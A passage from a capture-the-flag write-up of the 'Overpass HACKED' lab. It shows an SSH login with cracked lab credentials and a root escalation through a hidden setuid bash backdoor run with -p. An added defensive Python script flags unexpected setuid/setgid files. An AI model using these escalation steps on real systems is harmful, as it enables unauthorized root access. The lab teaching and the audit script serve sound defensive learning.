
Overpass HACKED

Privilege Escalation

We can log in over SSH with the cracked password. The attacker left a way to get root access without a password: a setuid-root copy of bash, .suid_bash, in james's home directory. Running it with -p keeps the effective UID of root instead of letting bash drop it.

  • Log in over SSH with the cracked credentials: james:november16
  • ssh -oHostKeyAlgorithms=+ssh-rsa james@10.10.49.160 -p 2222
james@overpass-production:/home/james$ id
uid=1000(james) gid=1000(james) groups=1000(james),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

  • The attacker left an easy way to gain root privileges: a hidden setuid binary.
  • /home/james/.suid_bash
james@overpass-production:/home/james/ssh-backdoor$ cd ..
james@overpass-production:/home/james$ ls -al
...
-rwsr-sr-x 1 root root 1113504 Jul 22 2020 .suid_bash
...
james@overpass-production:/home/james$ mv .suid_bash suid_bash
james@overpass-production:/home/james$ ./suid_bash -p
root@overpass-production:/home/james$ id
uid=1000(james) gid=1000(james) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),1000(james)
root@overpass-production:/home/james$ whoami
root
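From the defender's side, the backdoor above is exactly what a setuid audit is meant to catch: a root-owned file with the s bit set, hidden as a dotfile under a home directory. The script below is an added example (not part of the original writeup or the room) that parses `ls -l` / `find -ls` style listings, flags setuid/setgid regular files that are not in a known-good baseline, and explains why each one is suspicious; it also includes a live `os.walk` scan for the same bits. The sample listing and the `KNOWN_SETUID` baseline are constructed placeholders, not data from the box.

```python
"""Flag setuid/setgid files in ls -l or find -ls output (added example)."""
import os
import re
import stat
from dataclasses import dataclass, field

# Permission column as printed by ls -l / find -ls, with an optional trailing
# '.' or '+' marker for SELinux context or ACLs.
MODE_RE = re.compile(r"^[-bcdlps][rwxsStT-]{9}[.+@]?$")

# Placeholder baseline of setuid binaries expected on a stock install.
# A real baseline would be generated from a known-good image (assumption).
KNOWN_SETUID = frozenset({"/usr/bin/passwd", "/usr/bin/sudo", "/bin/su"})

# Constructed sample resembling `find / -type f \( -perm -4000 -o -perm -2000 \) -ls`.
SAMPLE_FIND_OUTPUT = """\
   131105     60 -rwsr-xr-x   1 root     root        59640 Mar 22  2019 /usr/bin/passwd
   131170    148 -rwsr-xr-x   1 root     root       149080 Jan 31  2020 /usr/bin/sudo
   262150   1088 -rwsr-sr-x   1 root     root      1113504 Jul 22  2020 /home/james/.suid_bash
   262160      4 -rw-r--r--   1 james    james         220 Apr  4  2018 /home/james/.bash_logout
"""


@dataclass
class Finding:
    path: str
    owner: str
    mode: str
    setuid: bool
    setgid: bool
    reasons: list = field(default_factory=list)


def parse_entry(line):
    """Return (mode, owner, group, path) from one ls -l or find -ls line.

    Works for both formats because the columns after the permission string
    are the same: links, owner, group, size, month, day, year/time, path.
    Lines without a permission column (e.g. "total 1120") return None.
    """
    tokens = line.split()
    for i, tok in enumerate(tokens):
        if MODE_RE.match(tok) and len(tokens) >= i + 9:
            return tok, tokens[i + 2], tokens[i + 3], " ".join(tokens[i + 8:])
    return None


def find_suid_entries(lines, baseline=KNOWN_SETUID):
    """Return Findings for regular files with setuid/setgid not in the baseline."""
    findings = []
    for line in lines:
        parsed = parse_entry(line)
        if parsed is None:
            continue
        mode, owner, group, path = parsed
        if not mode.startswith("-"):      # regular files only; skip dirs, links, devices
            continue
        setuid = mode[3] in "sS"           # owner execute slot
        setgid = mode[6] in "sS"           # group execute slot
        if not (setuid or setgid) or path in baseline:
            continue
        reasons = []
        if setuid and owner == "root":
            reasons.append("setuid root")
        if setgid and group == "root":
            reasons.append("setgid root")
        if os.path.basename(path).startswith("."):
            reasons.append("hidden file")
        if path.startswith("/home/") or path.startswith("/root/"):
            reasons.append("under a home directory")
        findings.append(Finding(path, owner, mode, setuid, setgid, reasons))
    return findings


def scan_tree(root):
    """Live check: walk a directory and return regular files with setuid/setgid set."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append(full)
    return hits


if __name__ == "__main__":
    for f in find_suid_entries(SAMPLE_FIND_OUTPUT.splitlines()):
        print(f"{f.mode} {f.owner} {f.path}: {', '.join(f.reasons)}")
```

On the sample listing only `/home/james/.suid_bash` is reported, with all four reasons attached; the stock `passwd` and `sudo` entries are suppressed by the baseline. Passing `baseline=frozenset()` lists every setuid/setgid file, which is the right first run on a host with no baseline yet.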